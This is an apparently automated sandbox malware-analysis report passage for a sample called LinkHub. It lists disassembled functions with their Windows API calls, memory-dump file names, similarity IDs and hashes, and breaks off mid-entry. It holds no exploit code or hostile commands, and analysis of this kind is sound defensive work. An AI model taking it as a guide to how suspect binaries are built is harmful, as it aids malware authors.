                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0026EB47
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0026EB5D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0026EB64
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2880819207-0
                                                                                        • Opcode ID: f3eca9d071d07de8c910dd500ef95538221e8e4e4a1f09953619095306366ace
                                                                                        • Instruction ID: 35d58cb1f3e20c5d627c2d6941def4d93a29797bfb66d5511b8a06321121a532
                                                                                        • Opcode Fuzzy Hash: f3eca9d071d07de8c910dd500ef95538221e8e4e4a1f09953619095306366ace
                                                                                        • Instruction Fuzzy Hash: 63112B7AD10219BBCB019FA8AC0EA9F7FACAB45314F114257F825E3290D675CD148B60
                                                                                        Function 0022D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,?,0022D369,00000000,00000004,00000000), ref: 0022D588
                                                                                        • GetLastError.KERNEL32 ref: 0022D594
                                                                                        • __dosmaperr.LIBCMT ref: 0022D59B
                                                                                        • ResumeThread.KERNEL32(00000000), ref: 0022D5B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                        • String ID:
                                                                                        • API String ID: 173952441-0
                                                                                        • Opcode ID: 3a41ced33124632e8fce3c3216679c8e9f15c127af81fb218c6644dca86ee482
                                                                                        • Instruction ID: ccdc3522c3320360c95e9b71d951e8076fb6a82ca049e9cf5456922f1e35537a
                                                                                        • Opcode Fuzzy Hash: 3a41ced33124632e8fce3c3216679c8e9f15c127af81fb218c6644dca86ee482
                                                                                        • Instruction Fuzzy Hash: FB01D676420124BBCB206FE5FC09BAA7B6DEF81335F500215F925861E0CBB08834DAA1
                                                                                        Function 00207873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002078B1
                                                                                        • GetStockObject.GDI32(00000011), ref: 002078C5
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 002078CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 9a9628f8f80fae6e9ca3e32d5b60dd7b64bddd974b9a0e720e3d9704e4eb53db
                                                                                        • Instruction ID: 82d41c370a6cf3fff5987e7f05874b54f18072ac475df8fe30eaa46ad2d640e0
                                                                                        • Opcode Fuzzy Hash: 9a9628f8f80fae6e9ca3e32d5b60dd7b64bddd974b9a0e720e3d9704e4eb53db
                                                                                        • Instruction Fuzzy Hash: 77118B72915249BFDF065F909C58EEABB69FF087A4F044116FA0452161D731AC60FBA0
                                                                                        Function 002333E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002711D9,00000000,00000000,?,0023338D,002711D9,00000000,00000000,00000000,?,002335FE,00000006,FlsSetValue), ref: 00233418
                                                                                        • GetLastError.KERNEL32(?,0023338D,002711D9,00000000,00000000,00000000,?,002335FE,00000006,FlsSetValue,002A3260,FlsSetValue,00000000,00000364,?,002331B9), ref: 00233424
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0023338D,002711D9,00000000,00000000,00000000,?,002335FE,00000006,FlsSetValue,002A3260,FlsSetValue,00000000), ref: 00233432
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3177248105-0
                                                                                        • Opcode ID: 74c4cff32470ccb59c603c6731d04a347f13f6714cfa452caec4de82c30b66db
                                                                                        • Instruction ID: 2ffaad60ec2aaaeee41861b16af2e49e39bbba34d786c537a7d56ea80e134454
                                                                                        • Opcode Fuzzy Hash: 74c4cff32470ccb59c603c6731d04a347f13f6714cfa452caec4de82c30b66db
                                                                                        • Instruction Fuzzy Hash: 9301D473B31223ABCB22CF79BC48A567B58AF05B71B210621FA06D3181C720DF21C6E0
                                                                                        Function 0026BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0026B69A,?,00008000), ref: 0026BA8B
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0026B69A,?,00008000), ref: 0026BAB0
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0026B69A,?,00008000), ref: 0026BABA
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0026B69A,?,00008000), ref: 0026BAED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • String ID:
                                                                                        • API String ID: 2875609808-0
                                                                                        • Opcode ID: 05942f4cbffe2627bcb6230a43f39af17cc4228b91ac24420b368de428d53d0f
                                                                                        • Instruction ID: 29c400ff9de3f87d81a02ad457901d464132d7a14e7f5bffe2bb511b9a587aae
                                                                                        • Opcode Fuzzy Hash: 05942f4cbffe2627bcb6230a43f39af17cc4228b91ac24420b368de428d53d0f
                                                                                        • Instruction Fuzzy Hash: 5F113C31C10519E7CF019FE5E94D6EEBB78BF09711F104096D585B2140CB705AE0DBA5
                                                                                        Function 0029886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 0029888E
                                                                                        • ScreenToClient.USER32(?,?), ref: 002988A6
                                                                                        • ScreenToClient.USER32(?,?), ref: 002988CA
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002988E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: 0cf65745030fa6d1bac6996f3a23beeabf65aeacfd700094f8c4b3c4dc5ef7bf
                                                                                        • Instruction ID: 1714512b7cfd307bf91d060320c6cfa2f124219587f61b0c0fd13e7d48f2c8d4
                                                                                        • Opcode Fuzzy Hash: 0cf65745030fa6d1bac6996f3a23beeabf65aeacfd700094f8c4b3c4dc5ef7bf
                                                                                        • Instruction Fuzzy Hash: 891143B9D0020AAFDB41DF98D8849EEBBB9FB08310F504156E915E2210D735AA54DF50
                                                                                        Function 002636F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00263712
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00263723
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0026372A
                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00263731
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: afbe09becc186737823886b438e42061e967d9415dd47471f0447919c6b3a4c0
                                                                                        • Instruction ID: 9f981c6a2ff57fb89c59df42f1cd5f6f48f91246b3d60f4cfdd059911b5c734a
                                                                                        • Opcode Fuzzy Hash: afbe09becc186737823886b438e42061e967d9415dd47471f0447919c6b3a4c0
                                                                                        • Instruction Fuzzy Hash: 5FE09BB115122477D7205BA2BC8DEE7BF6CEF42BA1F400016F105D1090DAA1C580D1B0
                                                                                        Function 002992BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00201F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00201F87
                                                                                          • Part of subcall function 00201F2D: SelectObject.GDI32(?,00000000), ref: 00201F96
                                                                                          • Part of subcall function 00201F2D: BeginPath.GDI32(?), ref: 00201FAD
                                                                                          • Part of subcall function 00201F2D: SelectObject.GDI32(?,00000000), ref: 00201FD6
                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002992E3
                                                                                        • LineTo.GDI32(?,?,?), ref: 002992F0
                                                                                        • EndPath.GDI32(?), ref: 00299300
                                                                                        • StrokePath.GDI32(?), ref: 0029930E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 1539411459-0
                                                                                        • Opcode ID: 3f03a7b4812c343399885bd5c7d7c2162584812ee1711fcf538e5cc3fd0f3ed8
                                                                                        • Instruction ID: bcd61f35c799b7a58d62ac67b666183151e0103b16d7d4135eb452e7a5c07d3b
                                                                                        • Opcode Fuzzy Hash: 3f03a7b4812c343399885bd5c7d7c2162584812ee1711fcf538e5cc3fd0f3ed8
                                                                                        • Instruction Fuzzy Hash: BFF08232016259BBDB125F64BC0EFCE3F59AF0A320F148042FA15210E2C7755566EFE9
                                                                                        Function 002021A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 002021BC
                                                                                        • SetTextColor.GDI32(?,?), ref: 002021C6
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 002021D9
                                                                                        • GetStockObject.GDI32(00000005), ref: 002021E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ModeObjectStockText
                                                                                        • String ID:
                                                                                        • API String ID: 4037423528-0
                                                                                        • Opcode ID: 18a36825a0d782cc63a152aa8f2266546a6b1e055707de06f4ad712fae17abc3
                                                                                        • Instruction ID: 931f91f729b02461341e64ed23fbb97cf82f9ee4d96a4e1e386d69a9dc7b1ec2
                                                                                        • Opcode Fuzzy Hash: 18a36825a0d782cc63a152aa8f2266546a6b1e055707de06f4ad712fae17abc3
                                                                                        • Instruction Fuzzy Hash: F2E06D32240241AADB219F74BC0DBE87B21AB16336F04821BF7BA580E1C7728650AB10
                                                                                        Function 0025EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 0025EC36
                                                                                        • GetDC.USER32(00000000), ref: 0025EC40
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0025EC60
                                                                                        • ReleaseDC.USER32(?), ref: 0025EC81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 077c58525c171135f34c0d06541d356b6233b93ef9ab5df33c05625d94cd6bfa
                                                                                        • Instruction ID: e5471bf46c07ad82499451e8b6f52f0e1c6d94f87789d81b8630e32f58c08f84
                                                                                        • Opcode Fuzzy Hash: 077c58525c171135f34c0d06541d356b6233b93ef9ab5df33c05625d94cd6bfa
                                                                                        • Instruction Fuzzy Hash: 6CE01A75810204DFCF409FA0E90CA5DBBB9EB18311F11840AE80AE3250C7795951AF04
                                                                                        Function 0025EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 0025EC4A
                                                                                        • GetDC.USER32(00000000), ref: 0025EC54
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0025EC60
                                                                                        • ReleaseDC.USER32(?), ref: 0025EC81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: acd60c545f93820d3af29fce60ca2d8b65d42ba65f62a129f915a284ee450032
                                                                                        • Instruction ID: 8e27866f66fbd56c56f7ac3b4289f8996b4b99c94df72de183a25c5c74a8f881
                                                                                        • Opcode Fuzzy Hash: acd60c545f93820d3af29fce60ca2d8b65d42ba65f62a129f915a284ee450032
                                                                                        • Instruction Fuzzy Hash: B9E012B9C00204EFCF509FA0E90CA5DBBB9AB18310B10840AE80AE3290CB796951AF00
                                                                                        Function 00253616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString
                                                                                        • String ID: @COM_EVENTOBJ$bn&
                                                                                        • API String ID: 2948472770-4249960297
                                                                                        • Opcode ID: 04013f83fd2db94f1a7f4388c9149319202fee5db09b48eb9784280fa7e2b81e
                                                                                        • Instruction ID: a75a332a67afa67805f810862aa75ceb60e7c54d7764639ef7a765812f2c7def
                                                                                        • Opcode Fuzzy Hash: 04013f83fd2db94f1a7f4388c9149319202fee5db09b48eb9784280fa7e2b81e
                                                                                        • Instruction Fuzzy Hash: CDF1C170A283019FD724DF14C885B6AB7E0BF84344F14885DF98A9B261C771EE69CF86
                                                                                        Function 002885DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 002205B2: EnterCriticalSection.KERNEL32(002D170C,?,00000000,?,0020D22A,002D3570,00000001,00000000,?,?,0027F023,?,?,00000000,00000001,?), ref: 002205BD
                                                                                          • Part of subcall function 002205B2: LeaveCriticalSection.KERNEL32(002D170C,?,0020D22A,002D3570,00000001,00000000,?,?,0027F023,?,?,00000000,00000001,?,00000001,002D2430), ref: 002205FA
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 00220413: __onexit.LIBCMT ref: 00220419
                                                                                        • __Init_thread_footer.LIBCMT ref: 00288658
                                                                                          • Part of subcall function 00220568: EnterCriticalSection.KERNEL32(002D170C,00000000,?,0020D258,002D3570,002427C9,00000001,00000000,?,?,0027F023,?,?,00000000,00000001,?), ref: 00220572
                                                                                          • Part of subcall function 00220568: LeaveCriticalSection.KERNEL32(002D170C,?,0020D258,002D3570,002427C9,00000001,00000000,?,?,0027F023,?,?,00000000,00000001,?,00000001), ref: 002205A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                        • String ID: Variable must be of type 'Object'.$bn&
                                                                                        • API String ID: 535116098-2939824160
                                                                                        • Opcode ID: b8f3a318ddacf2d7e898e61bac7e3a4f661a5868a95f175aa7b0e214c44e9b4f
                                                                                        • Instruction ID: 71332af4a598a883ca66da272aad0cfe2629ae1b5b00eda4b785929565d5db34
                                                                                        • Opcode Fuzzy Hash: b8f3a318ddacf2d7e898e61bac7e3a4f661a5868a95f175aa7b0e214c44e9b4f
                                                                                        • Instruction Fuzzy Hash: 3B918F38A21209EFCB14EF54D885DADB7B5BF08300F908059F9066B292DB71AE61CF51
                                                                                        Function 002757CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 002041EA: _wcslen.LIBCMT ref: 002041EF
                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00275919
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection_wcslen
                                                                                        • String ID: *$LPT
                                                                                        • API String ID: 1725874428-3443410124
                                                                                        • Opcode ID: 04ae48f9ac37ff19767bb94d39746356540983c9e438e552077197cfe5acc080
                                                                                        • Instruction ID: 07c65d3ffc2c7023987aee13447159410d78089f77958027325dc0477533505c
                                                                                        • Opcode Fuzzy Hash: 04ae48f9ac37ff19767bb94d39746356540983c9e438e552077197cfe5acc080
                                                                                        • Instruction Fuzzy Hash: 54918B75A10615DFCB14DF54C484EAABBF1AF44304F18C099E84A9F3A2C7B1EE96CB90
                                                                                        Function 00265703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 002658AF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: 0$-$Container
                                                                                        • API String ID: 3565006973-3151908934
                                                                                        • Opcode ID: 29f2afe4ddf29299f64677b406f9b628b8c956cff45e77203e106a040b85af4a
                                                                                        • Instruction ID: 9d5d04b999625ce55fc78013a1ec7e680376fe5f63eb6b2a8b126be564700db4
                                                                                        • Opcode Fuzzy Hash: 29f2afe4ddf29299f64677b406f9b628b8c956cff45e77203e106a040b85af4a
